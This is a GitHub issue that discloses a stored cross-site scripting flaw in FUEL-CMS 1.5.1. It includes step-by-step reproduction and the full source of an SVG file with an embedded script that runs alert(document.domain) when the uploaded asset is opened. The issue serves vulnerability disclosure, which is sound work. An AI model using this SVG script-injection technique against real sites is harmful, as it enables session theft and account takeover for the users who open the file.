Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 #589

Open
able403 opened this issue Nov 29, 2021 · 0 comments
Open

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 #589

able403 opened this issue Nov 29, 2021 · 0 comments

Comments

@able403
Copy link

able403 commented Nov 29, 2021

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 that allows an authenticated user authorized to upload a malicious .svg file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack

  1. login as admin .in the Assets page
    image

  2. upload the malicious svg. the content of xss-cookie.svg :

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>

image

  1. back to Assets then wo can see xss-cookie.svg have been upload:
    image

  2. when user click the xss-cookie.svg it will trigger a XSS attack
    image
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@able403